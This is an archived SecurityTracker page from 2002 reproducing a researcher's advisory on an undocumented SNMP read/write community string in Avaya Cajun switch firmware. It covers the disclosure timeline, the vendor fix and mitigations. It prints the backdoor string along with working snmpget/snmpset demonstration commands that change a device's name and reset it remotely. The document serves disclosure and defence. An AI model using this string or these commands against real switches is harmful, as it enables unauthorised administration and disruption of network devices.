SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Device (Router/Bridge/Hub)  >   Cajun Network Switches Vendors:   Avaya
Avaya Cajun Switch Undocumented SNMP Community String Lets Remote Users Administer the Device
SecurityTracker Alert ID:  1004949
SecurityTracker URL:  http://securitytracker.com/id/1004949
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Aug 6 2002
Impact:   Disclosure of system information, Modification of system information, Root access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): P330T, P333R, P130, M770-ATM and M770 Supervisor (M-SPX, M-SPS) and possibly other models
Description:   A vulnerability was reported in the Avaya Cajun series of network switches. A remote user can gain administrative control via SNMP.

It is reported that various Cajun firmware versions contain an undocumented community read/write string:

NoGaH$@!

A remote user can use the string to obtain administrative control of the system. Some demonstration exploit strings are provided:

sq5bpf@hash:~$ snmpget 192.168.0.3 'NoGaH$@!' system.sysName.0 system.sysName.0 = AsnNull
sq5bpf@hash:~$ snmpset 192.168.0.3 'NoGaH$@!' system.sysName.0 s 'Hello there :)' system.sysName.0 = Hello there :)
sq5bpf@hash:~$ snmpget 192.168.0.3 'NoGaH$@!' system.sysName.0 system.sysName.0 = Hello there :)

The following demonstration exploit to reset the device is provided:

sq5bpf@hash:~$ snmpset 192.168.0.3 'NoGaH$@!' .1.3.6.1.4.1.81.7.7.0 i 1 enterprises.81.7.7.0 = 1

Impact:   A remote user can administer the device via SNMP.
Solution:   The vendor has released a fixed version, available at:

http://support.avaya.com

Vendor URL:  www1.avaya.com/enterprise/who/docs/product12.html (Links to External Site)
Cause:   Authentication error

Message History:   None.


 Source Message Contents

Subject:  SNMP vulnerability in AVAYA Cajun firmware


1. Problem Description

There exists an undocumented SNMP r/w community string in firmware for
Avaya Cajun P33x series hardware. This allows anyone having SNMP access to
the device to administer it.

2. Tested systems

The following versions were tested and found vulnerable:

Avaya Cajun P330T software version 3.8.2 and 3.9.1
Avaya Cajun P333R software version 3.8.1 and 3.9.1

Additionaly firmware for P130, M770-ATM and M770 Supervisor (M-SPX, M-SPS)
was found to be vulnerable.


3. Details

Various Cajun firmware contains an undocumented community r/w string NoGaH$@!
To test try:

sq5bpf@hash:~$ snmpget 192.168.0.3 'NoGaH$@!' system.sysName.0
system.sysName.0 = AsnNull
sq5bpf@hash:~$ snmpset 192.168.0.3 'NoGaH$@!' system.sysName.0 s 'Hello there :)'
system.sysName.0 = Hello there :)
sq5bpf@hash:~$ snmpget 192.168.0.3 'NoGaH$@!' system.sysName.0
system.sysName.0 = Hello there :)

Reset a Cajun switch remotely (fun party trick):

sq5bpf@hash:~$ snmpset 192.168.0.3 'NoGaH$@!' .1.3.6.1.4.1.81.7.7.0 i 1
enterprises.81.7.7.0 = 1


4. Recommendations

As always it is good administrative practice to block SNMP at the
firewall, especially now after the release of the PROTOS SNMP testing
suite. However, the vulnerability is also present on P333R router
interfaces, which have a higher chance of being exposed to the outside
world:

sq5bpf@hash:~$ snmpget 192.168.0.4 'NoGaH$@!' system.sysDescr.0
system.sysDescr.0 = Avaya Inc. - P333R , SW version 3.9.1 , CS 2.4

If for some reason the user is unable to upgrade to a fixed version, in
order to mitigate the bug one can restrict SNMP access using the
'set allowed managers' command, which appeared in recent Cajun firmware.


5. Vendor status

AVAYA was informed on 27 May 2002. The vendor responded on May 28 2002. As
the vendor proved responsive and worked promptly on the problem, I have
agreed to release the information after the release of fixed software. The
fixed software has been released on July 4, and is avaliable from the
Avaya support site http://support.avaya.com. Official AVAYA security
advisories are located at http://support.avaya.com/security/


6. Disclaimer

Neither I nor my employer is responsible for the use or misuse of
information in this advisory.  The opinions expressed are my own and not
of any company.  Any use of the information is at the user's own risk.


Jacek Lipkowski sq5bpf@andra.com.pl

Andra Co. Ltd.
ul Wynalazek 6
02-677 Warsaw, Poland
http://www.andra.com.pl



 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC